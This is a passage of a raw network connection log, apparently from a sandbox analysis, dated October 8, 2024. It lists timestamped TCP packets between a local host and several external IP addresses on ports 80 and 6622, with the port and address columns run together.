                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.636470079 CEST805015935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.636579990 CEST5015980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.636658907 CEST5015980192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.641887903 CEST805015935.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.662113905 CEST5016080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.667176962 CEST805016018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.670627117 CEST5016080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.670897961 CEST5016080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.670928955 CEST5016080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.676110983 CEST805016018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.676166058 CEST805016018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.915174961 CEST805015818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.915599108 CEST805015818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.915741920 CEST5015880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.915919065 CEST5015880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.921087980 CEST805015818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.958029985 CEST662250157204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.958173990 CEST501576622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.958241940 CEST501576622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.964201927 CEST662250157204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.415119886 CEST5016180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.588723898 CEST805016113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.588865995 CEST5016180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.589046001 CEST5016180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.589068890 CEST5016180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.593935966 CEST805016113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.593949080 CEST805016113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.786619902 CEST501626622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.791695118 CEST662250162204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.791990995 CEST501626622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.796257973 CEST501626622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.801213026 CEST662250162204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.017112017 CEST805016018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.017374039 CEST5016080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.017496109 CEST805016018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.017549038 CEST5016080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.022470951 CEST805016018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.042244911 CEST4990580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.042617083 CEST5016380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.047642946 CEST8049905208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.047816992 CEST8050163208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.047880888 CEST5016380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.048161030 CEST4990580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.048300982 CEST5016380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.048342943 CEST5016380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.053173065 CEST8050163208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.053409100 CEST8050163208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.555800915 CEST8050163208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.719012022 CEST5016380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.719044924 CEST5016380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.724066019 CEST8050163208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.724229097 CEST8050163208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.835093021 CEST8050163208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.855367899 CEST5016480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.860398054 CEST805016444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.860610962 CEST5016480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.861241102 CEST5016480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.861279011 CEST5016480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.866112947 CEST805016444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.866235018 CEST805016444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.920583010 CEST805016113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.921139002 CEST805016113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.921217918 CEST5016180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.921313047 CEST5016180192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.926393986 CEST5016380192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.926532984 CEST805016113.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.145895004 CEST5016580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.151031971 CEST805016518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.153146982 CEST5016580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.153146982 CEST5016580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.153321981 CEST5016580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.158366919 CEST805016518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.158716917 CEST805016518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.268862009 CEST662250162204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.268924952 CEST501626622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.269325972 CEST501626622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.274276972 CEST662250162204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.317003965 CEST805016444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.317171097 CEST5016480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.317536116 CEST805016444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.317596912 CEST5016480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.322112083 CEST805016444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.337856054 CEST5016680192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.342823982 CEST805016634.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.346894979 CEST5016680192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.346894979 CEST5016680192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.346998930 CEST5016680192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.351807117 CEST805016634.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.352353096 CEST805016634.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.613483906 CEST805016518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.613991976 CEST805016518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.614382029 CEST5016580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.616003036 CEST5016580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.621413946 CEST805016518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.857922077 CEST5016780192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.863338947 CEST805016744.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.864736080 CEST5016780192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.864891052 CEST5016780192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.864933014 CEST5016780192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.870227098 CEST805016744.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.870237112 CEST805016744.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.072403908 CEST805016634.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.072861910 CEST805016634.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.072957039 CEST5016680192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.085114002 CEST501686622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.087313890 CEST5016680192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.090297937 CEST662250168204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.090823889 CEST501686622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.092205048 CEST805016634.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.096601963 CEST501686622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.101639986 CEST662250168204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.109374046 CEST5016980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.114518881 CEST805016918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.114605904 CEST5016980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.114905119 CEST5016980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.114928961 CEST5016980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.120260000 CEST805016918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.120798111 CEST805016918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.327686071 CEST805016744.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.328161001 CEST5016780192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.328655958 CEST805016744.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.328764915 CEST5016780192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.332999945 CEST805016744.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.494441986 CEST5017080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.499737024 CEST805017044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.499931097 CEST5017080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.500425100 CEST5017080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.500425100 CEST5017080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.505538940 CEST805017044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.505605936 CEST805017044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.589359045 CEST805016918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.589812040 CEST5016980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.590742111 CEST805016918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.590806007 CEST5016980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.594877005 CEST805016918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.625888109 CEST5017180192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.631238937 CEST80501713.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.634746075 CEST5017180192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.634922028 CEST5017180192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.634922028 CEST5017180192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.640178919 CEST80501713.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.640413046 CEST80501713.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.968970060 CEST805017044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.970354080 CEST805017044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.970458984 CEST5017080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.972976923 CEST5017080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.978486061 CEST805017044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.387723923 CEST80501713.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.388952017 CEST80501713.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.390604973 CEST5017180192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.490109921 CEST5017180192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.496345043 CEST80501713.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.513026953 CEST5017280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.518177032 CEST805017254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.518264055 CEST5017280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.535588980 CEST5017280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.535588980 CEST5017280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.540782928 CEST805017254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.540800095 CEST805017254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.586206913 CEST662250168204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.586266994 CEST501686622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.586318970 CEST501686622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.591284037 CEST662250168204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.742261887 CEST5017380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.747447968 CEST805017354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.747523069 CEST5017380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.747864962 CEST5017380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.748222113 CEST5017380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.753004074 CEST805017354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.753494978 CEST805017354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.256568909 CEST805017254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.257108927 CEST5017280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.257158041 CEST805017254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.257424116 CEST5017280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.262037992 CEST805017254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.275006056 CEST5017480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.281501055 CEST805017454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.284778118 CEST5017480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.284884930 CEST5017480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.284914017 CEST5017480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.290148020 CEST805017454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.290574074 CEST805017454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.364265919 CEST501756622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.369288921 CEST662250175204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.372811079 CEST501756622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.376465082 CEST501756622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.381478071 CEST662250175204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.497769117 CEST805017354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.497975111 CEST805017354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.498023033 CEST5017380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.523611069 CEST5017380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.528892994 CEST805017354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.944478035 CEST5017680192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.949548960 CEST80501763.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.949630976 CEST5017680192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.950469971 CEST5017680192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.950508118 CEST5017680192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.955662012 CEST80501763.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.955702066 CEST80501763.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.019829035 CEST805017454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.020035028 CEST805017454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.020207882 CEST5017480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.020416021 CEST5017480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.025585890 CEST805017454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.043812037 CEST5017780192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.050160885 CEST805017744.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.050441027 CEST5017780192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.050441027 CEST5017780192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.050468922 CEST5017780192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.055830002 CEST805017744.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.055847883 CEST805017744.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.516978979 CEST805017744.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.517555952 CEST805017744.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.517863035 CEST5017780192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.517992973 CEST5017780192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.523411036 CEST805017744.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.588865995 CEST5017880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.594429970 CEST805017818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.594572067 CEST5017880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.615616083 CEST5017880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.615653038 CEST5017880192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.620918989 CEST805017818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.621001005 CEST805017818.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.688638926 CEST80501763.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.688922882 CEST80501763.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.689022064 CEST5017680192.168.2.43.254.94.185
